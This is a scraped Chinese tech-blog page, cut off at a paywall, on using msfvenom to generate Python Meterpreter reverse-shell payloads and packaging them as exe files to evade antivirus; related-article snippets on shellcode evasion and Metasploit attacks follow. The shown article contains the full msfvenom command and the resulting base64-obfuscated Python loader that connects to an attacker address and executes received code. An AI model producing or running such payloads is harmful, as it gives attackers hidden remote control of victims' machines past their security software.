python调用msf_MSF利用python反弹shell-Bypass AV

最新推荐文章于 2024-01-19 16:26:28 发布
VIP文章 最新推荐文章于 2024-01-19 16:26:28 发布
阅读量1.5k 收藏
点赞数
文章标签: python调用msf

本文主要介绍两种利用msf生成python版 payload,并利用Py2exe或PyInstaller将python文件转为exe文件,可成功bypass某些AV反弹shell

msf-python反弹shell姿势1

1) msfvenom生成python后门

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.131 LPORT=4444 -f raw -o /tmp/mrtp.py

20190712224003-eefa9692-a4b2-1.png

生成的mrtp.py文件如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTMxJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))

对其中的base64解码为:

<
最低0.47元/天 解锁文章
weixin_39883079
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python实现远程调用MetaSploit的方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit的方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:~# apt-get install python-setuptools root@kali:~# easy_install msgpack-python   (2)创建createdb_sql.txt: create database msf; create user msf with password 'msf123'; gra
Shellcode免杀对抗(Python)
热门推荐
qq_74806534的博客
02-17 2万+
常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名。先cs生成payload,此时生成c的和Python应该是效果一样的(x64尽量不开,因为我没有尝试成功)注意在生成的payload是被分行的,放到的代码里的时候,要像CS一样并成一行,很麻烦。先base64,可以过掉火绒,过不了defender/360。
Python写了一个上课点名系统(附源码)(自制考勤系统)
m0_59236127的博客
01-19 1607
本次使用Tkinter开发了一款上课点名程序,此程序可以用于点名、抽奖…代码不到200行,程序简单又实用,主要有以下六个亮点:1.两种模式:顺序点名随机点名2.自动识别人名单3.支持手动导入人名单4.人名单导入校验5.人名显示位置自动矫正6.最多显示五个大字以上就是“用Python写了一个上课点名系统(附源码)(自制考勤系统)”的全部内容,希望对你有所帮助。​​。
免杀对抗-MSF\CS-shellcode反序列化
m0_62172162的博客
04-25 544
免杀对抗-MSF\CS-shellcode反序列化
Sqlmap基础用法
wang720521的博客
01-28 3403
SQLmap 用法 用法:python sqlmap.py [选项] 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序版本信息并退出 -v VERBOSE 输出信息详细程度级别:0-6(默认为 1) 目标: 至少提供一个以下选项以指定目标 -d DIRECT 直接连接数据库
python调用msf_从python poc到metasploit模块
weixin_39521651的博客
11-30 726
metasploit5从metasploit开始引入了第三方模块,也就是说可以使用python来编写模块。并且可以加入主分支。得到最新版本由于kail等渗透系统并不是使用github上的最新版本,版本还在4.x。所以我们需要在github上下载git clone https://github.com/rapid7/metasploit-framework/将原来的msf配置文件复制到下载下来的文件...
远程调用python_Python 远程调用MetaSploit
weixin_39882317的博客
11-29 83
(1)安装Python的msgpack类库。MSF官方文档中的数据序列化标准就是參照msgpack。root@kali:~# apt-get install python-setuptoolsroot@kali:~# easy_install msgpack-python(2)创建createdb_sql.txt:create database msf;create user msf with p...
MSF渗透测试之msfvenom提权之python
lza20001103的博客
04-05 3377
MSF渗透测试之msfvenom提权之python
python调用msf_Python-实现与metasploit交互并进行ms17_010攻击
weixin_39947314的博客
11-30 321
关于ms17_010,可参考http://www.cnblogs.com/sch01ar/p/7672454.html目标IP:192.168.220.139本机IP:192.168.220.145# -*- coding:utf-8 -*-__author__ = "MuT6 Sch01aR"import osdef Handler(configFile,lhost,lport,rhost):c...
python调用msf_使用python操纵metasploit简单小记
weixin_39900468的博客
11-30 1852
最近想做一款自动化的主机漏洞扫描工具。打算以python作为基础语言,metasploit作为开发基础库。查资料发现国内的论坛博客都只会互相抄来抄去,没一个能打的。那就我来写一篇。本文用到的python库是allfro/pymetasploit使用pip进行安装pip install pymetasploit我的开发环境是windows,metasploit跑在kali环境下。所以在kali下面要...
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
09-10
MSF_EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831-.txt
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
rtk_sensor_damagezfw_rtk_ROS_gpsrtkros_msf-ekf_
09-30
ros RTK驱动,可用于ROS开发,需要建立ROS工作空间
Python-AV-Evasion:执行shellcode并使用python逃避AV检测
05-04
generate.py确实从给定的shellcode(从文件读取或由msfpayload / msfvenom插入)中生成python脚本(与以前的脚本类似),还可以选择添加Hyperion / Veil / 例如AV逃避)。 生成的脚本可以很好地与PyInstaller或类似...
node-v12.22.1-linux-x64.tar.xz
最新发布
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于微信小程序的校园综合服务小程序
04-29
大学生毕业设计、大学生课程设计作业
node-v7.8.0-linux-armv7l.tar.gz
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
毕业设计:Python招聘分析系统论文(源码 + 数据库 + 说明文档)
04-29
毕业设计:Python招聘分析系统论文(源码 + 数据库 + 说明文档) 2 需求分析 9 2.1功能需求分析 9 2.2 可行性分析 9 2.2.1 技术可行性 9 2.2.2 经济可行性 9 2.2.3 操作可行性 10 2.2.4 发展可行性 10 2.3系统性需求分析 10 2.4招聘分析系统管理功能 11 3 总体设计 12 3.1 系统结构 12 3.2 数据库设计 12 3.2.1 数据库实体 12 3.2.2 数据库表设计 13 4 运行设计 15 4.1 招聘热门行业分析 15 4.2热门岗位分析界面 15 4.3招聘岗位学历分析界面 16 4.4岗位分布分析界面 16 5 系统测试 18 5.1测试环境与条件 18 5.2功能测试 18 5.3安全测试 18 5.4可用性测试 18 5.5测试结果分析 19
win11修复-网络正常-永远是地球小图标的bug
04-29
win11修复-网络正常-永远是地球小图标的bug
#!/usr/bin/env bash python3 train.py \ --data_dir <Your data dir> \ --images_folder imgs/ \ --train_annotations_file aus_dataset.pkl \ --test_annotations_file aus_dataset_test.pkl \ --generator_name unet_msf_generator \ --normtype_G instancenorm \ --discriminator_name discriminator_wgan_plus \ --normtype_D None \ --name experiment_1 \ --nepochs_no_decay 30 \ --nepochs_decay 20 \ --gpu_ids 0,1 \ --lr_D 1e-4 \ --lr_G 1e-4 \ --lr_decays_to 1e-5 \ --image_size 128 \ --batch_size 16 \ --ngf 64 \ --ndf 64 \ --cond_nc 13 \ --train_G_every_n_iterations 4 \ --lambda_D_prob 1 \ --lambda_D_cond 150 \ --lambda_D_gp 10 \ --lambda_G_fake_cond 150 \ --lambda_rec_l1 30 \ --lambda_cyc_l1 30 \ --lambda_smooth 1e-5
07-13
根据你提供的内容,这是一个 Bash 脚本,其中调用了 `python3` 命令来运行 `train.py` 脚本,并传递了一系列参数。 在运行这个脚本之前,你需要确保以下几点: 1. Python 环境:你需要安装 Python 3,并且在命令行中可以使用 `python3` 命令来执行 Python 代码。你可以使用 `python3 --version` 命令检查 Python 版本。 2. 依赖项:脚本可能依赖一些 Python 包或库,请确保你已经安装了这些依赖项。你可以使用 `pip install package_name` 命令来安装所需的包。 3. 数据目录和文件:在运行脚本时,你需要提供正确的数据目录和文件路径。请将 `<Your data dir>` 替换为你实际的数据目录路径,并确保 `imgs/`、`aus_dataset.pkl` 和 `aus_dataset_test.pkl` 这些文件存在于指定的路径中。 4. GPU 支持:脚本中使用了 `--gpu_ids 0,1` 参数来指定在哪些 GPU 上运行训练。请确保你有可用的 GPU,并且已经安装了相应的 GPU 驱动和 CUDA 工具包。 在确认满足上述要求后,你可以在终端中运行该脚本,例如: ```bash bash train.sh ``` 这将执行 `train.sh` 脚本,并传递相应的参数给 `train.py` 脚本进行训练。请注意,你可能还需要根据自己的需求对脚本中的参数进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值